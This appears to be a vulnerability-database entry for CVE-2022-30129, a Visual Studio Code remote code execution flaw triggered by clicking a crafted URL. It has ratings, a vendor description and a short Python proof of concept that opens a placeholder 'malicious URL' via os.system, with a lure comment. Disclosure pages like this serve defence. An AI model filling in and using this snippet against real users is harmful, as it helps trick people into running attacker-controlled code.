Attacker Value
High
(1 user assessed)
Exploitability
High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown

CVE-2022-30129

MITRE ATT&CK tactics: Execution

Description

Visual Studio Code Remote Code Execution Vulnerability.

Ratings
  • Attacker Value
    High
  • Exploitability
    High
Technical Analysis

Vendor

  • Platform Windows 11

Description:

Visual Studio Code latest version – Remote Code Execution Vulnerability.
The user would have to click on a specially crafted URL while editing code, or just execute an already compiled malicious program, to be compromised by the attacker.

Microsoft:

  • FAQ:
According to the CVSS metric, user interaction is required (UI:R). What interaction would the user have to do?
The user would have to click on a specially crafted URL to be compromised by the attacker.

PoC

#!/usr/bin/python
# Author: nu11seur1ty
# CVE CVE-2022-30129
import os

# The security encrypted link to the company!
os.system("explorer \"_Your_malicious_URL_here\"")


Proof and Exploit:


General Information

Vendors

  • Microsoft

Products

  • Visual Studio Code
